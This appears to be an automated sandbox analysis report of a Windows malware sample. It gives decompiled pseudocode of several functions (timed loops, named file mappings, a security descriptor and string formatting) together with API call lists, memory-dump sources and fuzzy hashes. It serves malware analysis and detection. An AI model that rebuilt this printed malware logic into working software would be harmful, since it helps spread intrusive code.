StrTrimA.SHLWAPI(00000000,00FC92CC,?,038F9630), ref: 00FC6F83

Part of subcall function 00FC2829: lstrlen.KERNEL32(038F887A,00000000,00000000,00000000,00FC6328,00000000), ref: 00FC2839
Part of subcall function 00FC2829: lstrlen.KERNEL32(?), ref: 00FC2841
Part of subcall function 00FC2829: lstrcpy.KERNEL32(00000000,038F887A), ref: 00FC2855
Part of subcall function 00FC2829: lstrcat.KERNEL32(00000000,?), ref: 00FC2860

lstrcpy.KERNEL32(00000000,?), ref: 00FC6FA3
lstrcat.KERNEL32(00000000,?), ref: 00FC6FB5
lstrcat.KERNEL32(00000000,00000000), ref: 00FC6FBB

Part of subcall function 00FC33FA: lstrlen.KERNEL32(?,00FCA380,73BB7FC0,00000000,00FC2788,?,?,?,?,?,00FC3EAC,?), ref: 00FC3403
Part of subcall function 00FC33FA: mbstowcs.NTDLL ref: 00FC342A
Part of subcall function 00FC33FA: memset.NTDLL ref: 00FC343C

wcstombs.NTDLL ref: 00FC704E

Part of subcall function 00FC1671: SysAllocString.OLEAUT32(00000000), ref: 00FC16B2
Part of subcall function 00FC1671: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 00FC1734
Part of subcall function 00FC1671: StrStrIW.SHLWAPI(00000000,006E0069), ref: 00FC1773

Part of subcall function 00FC2A03: HeapFree.KERNEL32(00000000,00000000,00FC4072,00000000,?,?,00000000,?,?,?,?,?,?,00FC44AE,00000000), ref: 00FC2A0F

RtlFreeHeap.NTDLL(00000000,?,00000000), ref: 00FC708F
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 00FC709F
RtlFreeHeap.NTDLL(00000000,00000000,?,038F9630), ref: 00FC70AF
HeapFree.KERNEL32(00000000,?), ref: 00FC70BF
RtlFreeHeap.NTDLL(00000000,?), ref: 00FC70CD

Strings

va\x, xrefs: 00FC6DDB

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
String ID: va\x
API String ID: 2871901346-1859480093
Opcode ID: 9849722b6869381b03c27c9ec9a8743237c1d95ff5921b9462db394b0f5c811d
Instruction ID: a38bbc9e20749c802db53783a4ec3098c9fea399df1352266b14cdd36202c059
Opcode Fuzzy Hash: 9849722b6869381b03c27c9ec9a8743237c1d95ff5921b9462db394b0f5c811d
Instruction Fuzzy Hash: D9A17C7190021EAFCB11DF68DE8AE9A3BA8FF49354F144069F809C7261D735E950EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E064800, Relevance: 21.5, APIs: 5, Strings: 7, Instructions: 507windowCOMMON

Download Yara Rule

APIs

FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56

Strings

8n, xrefs: 6E064E05
Xn, xrefs: 6E064AA5
8n, xrefs: 6E064CD6
8n, xrefs: 6E0649EA
Xn, xrefs: 6E064962
n, xrefs: 6E064E9E
Hn, xrefs: 6E064E69

Memory Dump Source

Source File: 00000000.00000002.1182584056.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false

Similarity

API ID: ChangeFindFirstNotification$IconLoad
String ID: n$8n$8n$8n$Hn$Xn$Xn
API String ID: 2944710551-1746711009
Opcode ID: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
Instruction ID: acc7cb7fa391fc89751ac312106f52c5dffe102a73241e06447973bcf2392f78
Opcode Fuzzy Hash: 47c1395ab908abb1d965f465569faf22cfb828acc0288b8712116717433e17bc
Instruction Fuzzy Hash: 5C12AD71A08A11EFDF44CF68C9AC3693BE1F786715F05A62EE48487385D7349C478B92

Uniqueness

Uniqueness Score: -1.00%

Function 00FC1B47, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00FC1B47(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xfca298);
					_v20 = 0;
					_v16 = 0;
					L00FC7F56();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xfca2c4; // 0x228
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xfca2a4 = 5;
						} else {
							_t69 = E00FC4A3C(_t74); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xfca2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E00FC243C( &_v20, _t73, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00FC7289(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xfca29c);
							goto L21;
						} else {
							__eflags =  *0xfca2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E00FC2813();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xfca2a0);
								L21:
								L00FC7F56();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xfca290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00fc1b47
0x00fc1b59
0x00fc1b5c
0x00fc1b68
0x00fc1b70
0x00fc1b73
0x00fc1cd9
0x00fc1b79
0x00fc1b79
0x00fc1b7b
0x00fc1b80
0x00fc1b81
0x00fc1b87
0x00fc1b8a
0x00fc1b8d
0x00fc1b9b
0x00fc1ba6
0x00fc1ba9
0x00fc1bab
0x00fc1bb8
0x00fc1bc2
0x00fc1bc6
0x00fc1bc9
0x00fc1bce
0x00fc1bd9
0x00fc1bd9
0x00fc1bd0
0x00fc1bd0
0x00fc1bd7
0x00000000
0x00000000
0x00fc1bd7
0x00fc1be3
0x00000000
0x00fc1be6
0x00fc1bea
0x00fc1bf5
0x00fc1bf5
0x00fc1bfc
0x00fc1c01
0x00fc1c08
0x00fc1c11
0x00fc1c17
0x00fc1c1a
0x00fc1c21
0x00fc1c24
0x00000000
0x00000000
0x00fc1c26
0x00fc1c29
0x00fc1c2c
0x00fc1c2f
0x00000000
0x00fc1c31
0x00fc1c40
0x00fc1c40
0x00000000
0x00fc1c6e
0x00fc1c6e
0x00fc1c73
0x00fc1c92
0x00fc1c94
0x00fc1c99
0x00fc1c9a
0x00000000
0x00fc1c75
0x00fc1c75
0x00fc1c7b
0x00000000
0x00fc1c7d
0x00fc1c7d
0x00fc1c82
0x00fc1c84
0x00fc1c89
0x00fc1c8a
0x00fc1ca0
0x00fc1ca0
0x00fc1ca8
0x00fc1cb3
0x00fc1cb6
0x00fc1cc1
0x00fc1cc3
0x00fc1cc5
0x00fc1cc8
0x00000000
0x00fc1cce
0x00000000
0x00fc1cce
0x00fc1cc8
0x00fc1c7b
0x00000000
0x00fc1c73
0x00fc1c43
0x00fc1c45
0x00fc1c48
0x00fc1c49
0x00fc1c49
0x00fc1c4d
0x00fc1c57
0x00fc1c57
0x00fc1c5d
0x00fc1c60
0x00fc1c60
0x00fc1c66
0x00fc1c66
0x00fc1ce3
0x00000000

APIs

memset.NTDLL ref: 00FC1B5C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00FC1B68
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00FC1B8D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00FC1BA9
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FC1BC2
HeapFree.KERNEL32(00000000,00000000), ref: 00FC1C57
CloseHandle.KERNEL32(?), ref: 00FC1C66
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00FC1CA0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00FC2F7D), ref: 00FC1CB6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FC1CC1

Part of subcall function 00FC4A3C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,038F9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00FC4A8B
Part of subcall function 00FC4A3C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,038F9370,?,00000000,30314549,00000014,004F0053,038F932C), ref: 00FC4B28
Part of subcall function 00FC4A3C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FC1BD5), ref: 00FC4B3A

GetLastError.KERNEL32 ref: 00FC1CD3

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: f1388545cd1f88955bdae120e256341d132a6d1f022a6b65e7609e655a6148f1
Instruction ID: 3cdf8f2e6b73d8d585caefb5f4fe81c803184d7e9be1f6d6c48c1fba5a55a49e
Opcode Fuzzy Hash: f1388545cd1f88955bdae120e256341d132a6d1f022a6b65e7609e655a6148f1
Instruction Fuzzy Hash: 27518971C0522EAACF10DF94DE46EEEBBB8FF46364F20411AF410A2191D7759A50EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E0517A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6E05146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6E0515A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6E051C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E051CA4(E6E0516EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E051D7C(_t45,  &_v48) != 0) {
					 *0x6e0541b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e0541b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E051C8F(_t50 + _t15);
				 *0x6e0541b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E05136A(_t44);
					goto L11;
				}
			}

0x6e0517b3
0x6e0517bc
0x6e0517c0
0x6e0518c8
0x6e0518ce
0x00000000
0x00000000
0x00000000
0x6e0517c6
0x6e0517c6
0x6e0517cb
0x6e0517d1
0x6e0517e0
0x6e0517e1
0x6e0517e4
0x6e0517e7
0x6e0517f0
0x6e0517f4
0x6e0517fa
0x6e0517fe
0x6e051805
0x00000000
0x00000000
0x6e05180b
0x6e051812
0x6e051816
0x6e0518b9
0x6e0518b9
0x6e0518c0
0x6e0518c2
0x6e0518c2
0x00000000
0x6e0518c0
0x6e05181f
0x6e051872
0x6e051872
0x6e051883
0x6e051887
0x6e0518b5
0x6e051889
0x6e05188c
0x6e051894
0x6e051898
0x6e0518a0
0x6e0518a0
0x6e0518a7
0x6e0518a7
0x00000000
0x6e051887
0x6e05182d
0x6e05186c
0x00000000
0x6e05186c
0x6e05182f
0x6e051833
0x6e05183c
0x6e05183e
0x6e051842
0x6e051864
0x6e051864
0x00000000
0x6e051864
0x6e051844
0x6e051849
0x6e051850
0x6e051855
0x00000000
0x6e051857
0x6e05185a
0x6e05185d
0x00000000
0x6e05185d

APIs

Part of subcall function 6E05146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
Part of subcall function 6E05146C: GetVersion.KERNEL32 ref: 6E05148A
Part of subcall function 6E05146C: GetCurrentProcessId.KERNEL32 ref: 6E051499
Part of subcall function 6E05146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2

GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6E0517CB
SwitchToThread.KERNEL32 ref: 6E0517D1

Part of subcall function 6E0515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
Part of subcall function 6E0515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
Part of subcall function 6E0515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6

Sleep.KERNELBASE(00000000,00000000), ref: 6E0517F4
GetLongPathNameW.KERNELBASE ref: 6E05183C
GetLongPathNameW.KERNELBASE ref: 6E05185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6E0516EC,?,00000000), ref: 6E05188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0518A0
CloseHandle.KERNEL32(00000000), ref: 6E0518A7
GetLastError.KERNEL32(6E0516EC,?,00000000), ref: 6E0518AF
GetLastError.KERNEL32 ref: 6E0518C2

Memory Dump Source

Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
Instruction ID: 73df094d14b09fda9497128790b28c4241294c38b37dfd2d5e6384718fc149a8
Opcode Fuzzy Hash: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
Instruction Fuzzy Hash: 88316471804F11ABD760DFE58A48BAF77ECEF8A754B100E1AF465C2344E734C918CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FC57AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FC57AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00FC7F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xfca2d0; // 0x292d5a8
				_t5 = _t13 + 0xfcb84d; // 0x38f8df5
				_t6 = _t13 + 0xfcb580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00FC7C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0xfca2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00fc57ad
0x00fc57b5
0x00fc57b9
0x00fc57bf
0x00fc57c4
0x00fc57c9
0x00fc57cc
0x00fc57cf
0x00fc57d4
0x00fc57d5
0x00fc57d8
0x00fc57dd
0x00fc57e4
0x00fc57ee
0x00fc57f0
0x00fc57f1
0x00fc57f4
0x00fc5810
0x00fc5816
0x00fc581a
0x00fc5868
0x00fc581c
0x00fc5829
0x00fc5839
0x00fc5841
0x00fc5853
0x00fc5857
0x00000000
0x00000000
0x00fc5843
0x00fc5846
0x00fc584b
0x00fc584d
0x00fc584d
0x00fc582b
0x00fc582d
0x00fc5859
0x00fc585a
0x00fc585a
0x00fc5829
0x00fc586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00FC2DF9,?,00000001,?), ref: 00FC57B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00FC57CF
_snwprintf.NTDLL ref: 00FC57F4
CreateFileMappingW.KERNELBASE(000000FF,00FCA2D4,00000004,00000000,00001000,?), ref: 00FC5810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9,?), ref: 00FC5822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00FC5839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9), ref: 00FC585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9,?), ref: 00FC5862

Memory Dump Source

Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 105e66c8db29b1e319d58db372d041b508eca14113f6dbe37c2db17b055b385e
Instruction ID: d991f1c4e600fecec8eb44307969f79f89322a4fb0b063dbb0a307e8c7f00715
Opcode Fuzzy Hash: 105e66c8db29b1e319d58db372d041b508eca14113f6dbe37c2db17b055b385e
Instruction Fuzzy Hash: 0C21D876944609FBD7119B64CE0BF9D77B9BB84B50F280028F605E71D0DB71A941EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC2D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00FC2D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00FC5901();
				if(_t27 != 0) {
					_t77 =  *0xfca2b4; // 0x2000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xfca2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xfca14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00FC4097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xfca2d0; // 0x292d5a8
					_push(0xfca2d8);
					_push(1);
					_t7 = _t32 + 0xfcb5bc; // 0x4d283a53
					 *0xfca2d4 = 0xc;
					 *0xfca2dc = 0;
					L00FC5EC2();
					_t36 = E00FC57AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00FC3946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00FC5C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xfca2d0; // 0x292d5a8
								_t18 = _t64 + 0xfcb916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xfca328 = _t87;
						}
						_t38 = E00FC2304();
						 *0xfca2c8 =  *0xfca2c8 ^ 0xe8fa7dd7;
						 *0xfca318 = _t38;
						_t39 = E00FC5C4E(0x60);
						__eflags = _t39;
						 *0xfca37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xfca37c; // 0x38f9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xfca37c; // 0x38f9630
							 *_t56 = 0xfcb882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xfca290, _t84, 0x52);
							__eflags = _t42;
							 *0xfca310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xfca2b4; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xfca2d0; // 0x292d5a8
								_t19 = _t76 + 0xfcb212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xfc92c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00FC3946( ~_v8 &  *0xfca2c8, 0xfca00c); // executed
								_t84 = E00FC374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00FC3E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00FC1B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00FC5D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xfca150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00FC63CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00fc2d63
0x00fc2d6e
0x00fc2d71
0x00fc2d74
0x00fc2d77
0x00fc2d7e
0x00fc2d80
0x00fc2d8c
0x00fc2d8e
0x00fc2d8e
0x00fc2d97
0x00fc2d9f
0x00fc2da2
0x00fc2dbc
0x00fc2dc1
0x00fc2dc2
0x00fc2dc4
0x00fc2dc9
0x00fc2dce
0x00fc2dd0
0x00fc2dd7
0x00fc2de1
0x00fc2de7
0x00fc2df4
0x00fc2dfb
0x00fc2e00
0x00fc2e00
0x00fc2e09
0x00fc2e32
0x00fc2e35
0x00fc2e42
0x00fc2e49
0x00fc2e55
0x00fc2e57
0x00fc2e59
0x00fc2e5e
0x00fc2e64
0x00fc2e6a
0x00fc2e70
0x00fc2e73
0x00fc2e78
0x00fc2e80
0x00fc2e82
0x00fc2e82
0x00fc2e85
0x00fc2e85
0x00fc2e8b
0x00fc2e90
0x00fc2e98
0x00fc2e9d
0x00fc2ea2
0x00fc2ea4
0x00fc2ea9
0x00fc2ed8
0x00fc2eab
0x00fc2eb0
0x00fc2eb5
0x00fc2eba
0x00fc2ec1
0x00fc2ec7
0x00fc2ecc
0x00fc2ed2
0x00fc2ed2
0x00fc2ed9
0x00fc2edb
0x00fc2eea
0x00fc2ef0
0x00fc2ef2
0x00fc2ef7
0x00fc2f23
0x00fc2ef9
0x00fc2ef9
0x00fc2eff
0x00fc2f0c
0x00fc2f12
0x00fc2f12
0x00fc2f1a
0x00fc2f1c
0x00fc2f24
0x00fc2f26
0x00fc2f2d
0x00fc2f3a
0x00fc2f44
0x00fc2f46
0x00fc2f48
0x00000000
0x00000000
0x00fc2f4a
0x00fc2f4f
0x00fc2f51
0x00fc2f58
0x00fc2f5c
0x00fc2f5f
0x00fc2f74
0x00fc2f78
0x00fc2f7d
0x00000000
0x00fc2f7d
0x00fc2f61
0x00fc2f63
0x00000000
0x00000000
0x00fc2f65
0x00fc2f6e
0x00fc2f70
0x00fc2f72
0x00000000
0x00000000
0x00000000
0x00fc2f72
0x00fc2f55
0x00fc2f55
0x00fc2f26
0x00fc2e0b
0x00fc2e0b
0x00fc2e10
0x00fc2f7f
0x00fc2f83
0x00fc2f8b
0x00fc2f8b
0x00000000
0x00fc2f83
0x00fc2e16
0x00fc2e19
0x00fc2e19
0x00fc2e1b
0x00fc2e1e
0x00fc2e26
0x00fc2e2d
0x00000000
0x00fc2f93
0x00fc2f93
0x00fc2f96
0x00fc2f9b
0x00fc2f9b

APIs

Part of subcall function 00FC5901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00FC2D7C,00000000,00000000,00000000,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC5910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00FCA2D8,00000000), ref: 00FC2DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC2E00
wsprintfA.USER32 ref: 00FC2E80
memset.NTDLL ref: 00FC2EB0
